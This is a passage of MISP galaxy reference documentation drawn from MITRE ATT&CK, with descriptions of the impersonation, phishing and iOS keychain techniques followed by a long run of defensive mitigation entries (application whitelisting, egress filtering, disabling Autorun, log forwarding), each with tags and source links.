Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary’s ultimate goals, possibly against multiple victims.

In many cases of business email compromise or email fraud campaigns, adversaries use impersonation to defraud victims — deceiving them into sending money or divulging information that ultimately enables [Financial Theft](https://attack.mitre.org/techniques/T1657).

Adversaries will often also use social engineering techniques such as manipulative and persuasive language in email subject lines and body text such as payment, request, or urgent to push the victim to act quickly before malicious activity is detected. These campaigns are often specifically targeted against people who, due to job roles and/or accesses, can carry out the adversary’s goal.  

Impersonation is typically preceded by reconnaissance techniques such as [Gather Victim Identity Information](https://attack.mitre.org/techniques/T1589) and [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591) as well as acquiring infrastructure such as email domains (i.e. [Domains](https://attack.mitre.org/techniques/T1583/001)) to substantiate their false identity.(Citation: CrowdStrike-BEC)

There is the potential for multiple victims in campaigns involving impersonation. For example, an adversary may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) targeting one organization which can then be used to support impersonation against other entities.(Citation: VEC)

The tag is: misp-galaxy:mitre-attack-pattern="Impersonation - T1656"

Table 6440. Table References

Links

https://attack.mitre.org/techniques/T1656

https://www.cloudflare.com/learning/email-security/what-is-vendor-email-compromise/::text=Vendor%20email%20compromise%2C%20also%20referred

https://www.crowdstrike.com/cybersecurity-101/business-email-compromise-bec/

Phishing - T1566

Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.

Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce)

Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)

The tag is: misp-galaxy:mitre-attack-pattern="Phishing - T1566"

Table 6441. Table References

Links

https://attack.mitre.org/techniques/T1566

https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends

https://blog.sygnia.co/luna-moth-false-subscription-scams

https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide

https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/

https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/

https://www.cisa.gov/uscert/ncas/alerts/aa23-025a

https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf

https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/

https://www.proofpoint.com/us/threat-reference/email-spoofing

Keychain - T1579

Adversaries may collect the keychain storage data from an iOS device to acquire credentials. Keychains are the built-in way for iOS to keep track of users' passwords and credentials for many services and features such as Wi-Fi passwords, websites, secure notes, certificates, private keys, and VPN credentials.

On the device, the keychain database is stored outside of application sandboxes to prevent unauthorized access to the raw data. Standard iOS APIs allow applications access to their own keychain contained within the database. By utilizing a privilege escalation exploit or existing root access, an adversary can access the entire encrypted database.(Citation: Apple Keychain Services)(Citation: Elcomsoft Decrypt Keychain)

The tag is: misp-galaxy:mitre-attack-pattern="Keychain - T1579"

Table 6442. Table References

Links

https://attack.mitre.org/techniques/T1579

https://blog.elcomsoft.com/2018/12/six-ways-to-decrypt-iphone-passwords-from-the-keychain/

https://developer.apple.com/documentation/security/keychain_services

https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-11.html

Course of Action

ATT&CK Mitigation.

Course of Action is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Registry Run Keys / Startup Folder Mitigation - T1060

Identify and block potentially malicious software that may be executed through run key or startup folder persistence using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Registry Run Keys / Startup Folder Mitigation - T1060"

Registry Run Keys / Startup Folder Mitigation - T1060 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1060" with estimative-language:likelihood-probability="almost-certain"

Table 6443. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1060

https://technet.microsoft.com/en-us/library/ee791851.aspx

Exfiltration Over Command and Control Channel Mitigation - T1041

Mitigations for command and control apply. Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Exfiltration Over Command and Control Channel Mitigation - T1041"

Exfiltration Over Command and Control Channel Mitigation - T1041 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

Table 6444. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1041

Exfiltration Over Other Network Medium Mitigation - T1011

Ensure host-based sensors maintain visibility into usage of all network adapters and prevent the creation of new ones where possible. (Citation: Microsoft GPO Bluetooth FEB 2009) (Citation: TechRepublic Wireless GPO FEB 2009)

The tag is: misp-galaxy:mitre-course-of-action="Exfiltration Over Other Network Medium Mitigation - T1011"

Table 6445. Table References

Links

https://attack.mitre.org/mitigations/T1011

https://technet.microsoft.com/library/dd252791.aspx

https://www.techrepublic.com/blog/data-center/configuring-wireless-settings-via-group-policy/

Disable or Remove Feature or Program - M1042

Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.

The tag is: misp-galaxy:mitre-course-of-action="Disable or Remove Feature or Program - M1042"

Table 6446. Table References

Links

https://attack.mitre.org/mitigations/M1042

Limit Access to Resource Over Network - M1035

Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.

The tag is: misp-galaxy:mitre-course-of-action="Limit Access to Resource Over Network - M1035"

Table 6447. Table References

Links

https://attack.mitre.org/mitigations/M1035

Data from Network Shared Drive Mitigation - T1039

Identify unnecessary system utilities or potentially malicious software that may be used to collect data from a network share, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Data from Network Shared Drive Mitigation - T1039"

Data from Network Shared Drive Mitigation - T1039 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"

Table 6448. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1039

https://technet.microsoft.com/en-us/library/ee791851.aspx

Windows Management Instrumentation Event Subscription Mitigation - T1084

Disabling WMI services may cause system instability and should be evaluated to assess the impact to a network. By default, only administrators are allowed to connect remotely using WMI; restrict other users that are allowed to connect, or disallow all users from connecting remotely to WMI. Prevent credential overlap across systems of administrator and privileged accounts. (Citation: FireEye WMI 2015)

The tag is: misp-galaxy:mitre-course-of-action="Windows Management Instrumentation Event Subscription Mitigation - T1084"

Windows Management Instrumentation Event Subscription Mitigation - T1084 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1084" with estimative-language:likelihood-probability="almost-certain"

Table 6449. Table References

Links

https://attack.mitre.org/mitigations/T1084

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf

Custom Command and Control Protocol Mitigation - T1094

Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports and through proper network gateway systems. Also ensure hosts are only provisioned to communicate over authorized interfaces.

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Custom Command and Control Protocol Mitigation - T1094"

Custom Command and Control Protocol Mitigation - T1094 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"

Table 6450. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1094

Image File Execution Options Injection Mitigation - T1183

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating all IFEO will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. (Citation: Microsoft IFEOorMalware July 2015) Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.

Identify and block potentially malicious software that may be executed through IFEO by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown executables.

The tag is: misp-galaxy:mitre-course-of-action="Image File Execution Options Injection Mitigation - T1183"

Image File Execution Options Injection Mitigation - T1183 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Image File Execution Options Injection - T1183" with estimative-language:likelihood-probability="almost-certain"

Table 6451. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://answers.microsoft.com/windows/forum/windows_10-security/part-of-windows-10-or-really-malware/af715663-a34a-423c-850d-2a46f369a54c

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1183

SIP and Trust Provider Hijacking Mitigation - T1198

Ensure proper permissions are set for Registry hives to prevent users from modifying keys related to SIP and trust provider components. Also ensure that these values contain their full path to prevent [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). (Citation: SpectorOps Subverting Trust Sept 2017)

Consider removing unnecessary and/or stale SIPs. (Citation: SpectorOps Subverting Trust Sept 2017)

Restrict storage and execution of SIP DLLs to protected directories, such as C:\Windows, rather than user directories.

Enable whitelisting solutions such as AppLocker and/or Device Guard to block the loading of malicious SIP DLLs. Components may still be able to be hijacked to suitable functions already present on disk if malicious modifications to Registry keys are not prevented.

The tag is: misp-galaxy:mitre-course-of-action="SIP and Trust Provider Hijacking Mitigation - T1198"

SIP and Trust Provider Hijacking Mitigation - T1198 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1198" with estimative-language:likelihood-probability="almost-certain"

Table 6452. Table References

Links

https://attack.mitre.org/mitigations/T1198

https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf

Standard Non-Application Layer Protocol Mitigation - T1095

Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports and through proper network gateway systems. Also ensure hosts are only provisioned to communicate over authorized interfaces.

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Standard Non-Application Layer Protocol Mitigation - T1095"

Standard Non-Application Layer Protocol Mitigation - T1095 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"

Table 6453. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1095

Deobfuscate/Decode Files or Information Mitigation - T1140

Identify unnecessary system utilities or potentially malicious software that may be used to deobfuscate or decode files or information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Deobfuscate/Decode Files or Information Mitigation - T1140"

Deobfuscate/Decode Files or Information Mitigation - T1140 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 6454. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1140

https://technet.microsoft.com/en-us/library/ee791851.aspx

Deploy Compromised Device Detection Method - M1010

A variety of methods exist that can be used to enable enterprises to identify compromised (e.g. rooted/jailbroken) devices, whether using security mechanisms built directly into the device, third-party mobile security applications, enterprise mobility management (EMM)/mobile device management (MDM) capabilities, or other methods. Some methods may be trivial to evade while others may be more sophisticated.

The tag is: misp-galaxy:mitre-course-of-action="Deploy Compromised Device Detection Method - M1010"

Deploy Compromised Device Detection Method - M1010 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446" with estimative-language:likelihood-probability="almost-certain"

Table 6455. Table References

Links

https://attack.mitre.org/mitigations/M1010

Data Transfer Size Limits Mitigation - T1030

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Data Transfer Size Limits Mitigation - T1030"

Data Transfer Size Limits Mitigation - T1030 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"

Table 6456. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1030

Data from Local System Mitigation - T1005

Identify unnecessary system utilities or potentially malicious software that may be used to collect data from the local system, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Data from Local System Mitigation - T1005"

Data from Local System Mitigation - T1005 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 6457. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1005

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

File System Logical Offsets Mitigation - T1006

Identify potentially malicious software that may be used to access logical drives in this manner, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="File System Logical Offsets Mitigation - T1006"

File System Logical Offsets Mitigation - T1006 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Direct Volume Access - T1006" with estimative-language:likelihood-probability="almost-certain"

Table 6458. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1006

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Caution with Device Administrator Access - M1007

Warn device users not to accept requests to grant Device Administrator access to applications without good reason.

Additionally, application vetting should include a check on whether the application requests Device Administrator access. Applications that do request Device Administrator access should be carefully scrutinized and only allowed to be used if a valid reason exists.

The tag is: misp-galaxy:mitre-course-of-action="Caution with Device Administrator Access - M1007"

Caution with Device Administrator Access - M1007 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"

Table 6459. Table References

Links

https://attack.mitre.org/mitigations/M1007

Indicator Removal on Host Mitigation - T1070

Automatically forward events to a log server or data repository to prevent conditions in which the adversary can locate and manipulate data on the local system. When possible, minimize time delay on event reporting to avoid prolonged storage on the local system. Protect generated event files that are stored locally with proper permissions and authentication and limit opportunities for adversaries to increase privileges by preventing Privilege Escalation opportunities. Obfuscate/encrypt event files locally and in transit to avoid giving feedback to an adversary.

The tag is: misp-galaxy:mitre-course-of-action="Indicator Removal on Host Mitigation - T1070"

Indicator Removal on Host Mitigation - T1070 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 6460. Table References

Links

https://attack.mitre.org/mitigations/T1070

Exploitation of Remote Services Mitigation - T1210

Segment networks and systems appropriately to reduce access to critical systems and services to controlled methods. Minimize available services to only those that are necessary. Regularly scan the internal network for available services to identify new and potentially vulnerable services. Minimize permissions and access for service accounts to limit impact of exploitation.

Update software regularly by employing patch management for internal enterprise endpoints and servers. Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization. Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing, if available. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for all software or services targeted.

The tag is: misp-galaxy:mitre-course-of-action="Exploitation of Remote Services Mitigation - T1210"

Exploitation of Remote Services Mitigation - T1210 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

Table 6461. Table References

Links

https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/

https://attack.mitre.org/mitigations/T1210

https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/

https://en.wikipedia.org/wiki/Control-flow_integrity

System Network Configuration Discovery Mitigation - T1016

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about a system’s network configuration, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="System Network Configuration Discovery Mitigation - T1016"

System Network Configuration Discovery Mitigation - T1016 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 6462. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1016

https://technet.microsoft.com/en-us/library/ee791851.aspx

Replication Through Removable Media Mitigation - T1091

Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if it is not required for business operations. (Citation: TechNet Removable Media Control)

Identify potentially malicious software that may be used to infect removable media or may result from tainted removable media, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Replication Through Removable Media Mitigation - T1091"

Replication Through Removable Media Mitigation - T1091 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"

Table 6463. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1091

https://support.microsoft.com/en-us/kb/967715

https://technet.microsoft.com/en-us/library/cc772540(v=ws.10).aspx

https://technet.microsoft.com/en-us/library/ee791851.aspx

Restrict File and Directory Permissions - M1022

Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.

The tag is: misp-galaxy:mitre-course-of-action="Restrict File and Directory Permissions - M1022"

Table 6464. Table References

Links

https://attack.mitre.org/mitigations/M1022

Exploitation for Client Execution Mitigation - T1203

Browser sandboxes can be used to mitigate some of the impact of exploitation, but sandbox escapes may still exist. (Citation: Windows Blogs Microsoft Edge Sandbox) (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Other types of virtualization and application microsegmentation may also mitigate the impact of client-side exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility.

The tag is: misp-galaxy:mitre-course-of-action="Exploitation for Client Execution Mitigation - T1203"

Exploitation for Client Execution Mitigation - T1203 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

Table 6465. Table References

Links

https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/

https://attack.mitre.org/mitigations/T1203

https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/

https://blogs.windows.com/msedgedev/2017/03/23/strengthening-microsoft-edge-sandbox/

https://en.wikipedia.org/wiki/Control-flow_integrity

Change Default File Association Mitigation - T1042

Direct mitigation of this technique is not recommended since it is a legitimate function that can be performed by users for software preferences. Follow Microsoft’s best practices for file associations. (Citation: MSDN File Associations)

Identify and block potentially malicious software that may be executed by this technique using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Change Default File Association Mitigation - T1042"

Change Default File Association Mitigation - T1042 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Change Default File Association - T1042" with estimative-language:likelihood-probability="almost-certain"

Table 6466. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1042

https://msdn.microsoft.com/en-us/library/cc144156.aspx

https://technet.microsoft.com/en-us/library/ee791851.aspx

Data from Removable Media Mitigation - T1025

Identify unnecessary system utilities or potentially malicious software that may be used to collect data from removable media, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Data from Removable Media Mitigation - T1025"

Data from Removable Media Mitigation - T1025 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"

Table 6467. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1025

https://technet.microsoft.com/en-us/library/ee791851.aspx

Exfiltration Over Physical Medium Mitigation - T1052

Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if they are not required for business operations. (Citation: TechNet Removable Media Control)

The tag is: misp-galaxy:mitre-course-of-action="Exfiltration Over Physical Medium Mitigation - T1052"

Exfiltration Over Physical Medium Mitigation - T1052 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Physical Medium - T1052" with estimative-language:likelihood-probability="almost-certain"

Table 6468. Table References

Links

https://attack.mitre.org/mitigations/T1052

https://support.microsoft.com/en-us/kb/967715

https://technet.microsoft.com/en-us/library/cc772540(v=ws.10).aspx

Communication Through Removable Media Mitigation - T1092

Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if they are not required for business operations. (Citation: TechNet Removable Media Control)

The tag is: misp-galaxy:mitre-course-of-action="Communication Through Removable Media Mitigation - T1092"

Communication Through Removable Media Mitigation - T1092 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Communication Through Removable Media - T1092" with estimative-language:likelihood-probability="almost-certain"

Table 6469. Table References

Links

https://attack.mitre.org/mitigations/T1092

https://support.microsoft.com/en-us/kb/967715

https://technet.microsoft.com/en-us/library/cc772540(v=ws.10).aspx

File and Directory Discovery Mitigation - T1083

File system activity is a common part of an operating system, so it is unlikely that mitigation would be appropriate for this technique. It may still be beneficial to identify and block unnecessary system utilities or potentially malicious software by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="File and Directory Discovery Mitigation - T1083"

File and Directory Discovery Mitigation - T1083 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 6470. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

